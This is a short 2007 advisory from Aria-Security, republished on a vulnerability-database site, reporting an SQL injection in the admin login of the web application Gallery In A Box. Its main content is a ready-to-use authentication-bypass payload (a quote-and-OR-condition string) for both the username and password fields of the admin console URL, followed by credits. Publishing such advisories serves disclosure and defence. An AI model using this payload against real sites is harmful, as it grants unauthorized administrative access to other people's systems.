Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17689
HistoryAug 03, 2007 - 12:00 a.m.

[Aria-Security.Net] Gallery In A Box Username & Password Parameters SQL Injection

2007-08-0300:00:00
vulners.com
137

A R I A - S E C U R I T Y


Gallery In A Box Username & Password Parameters SQL Injection
Vendor: http://www.kerberosdev.net/

http://target.com/admin_console/index.asp

Username: anything' OR 'x'='x
Password: anything' OR 'x'='x

Credits: Aria-Security Team
http://aria-security.net
http://outlaw.aria-security.info
Greetz: AurA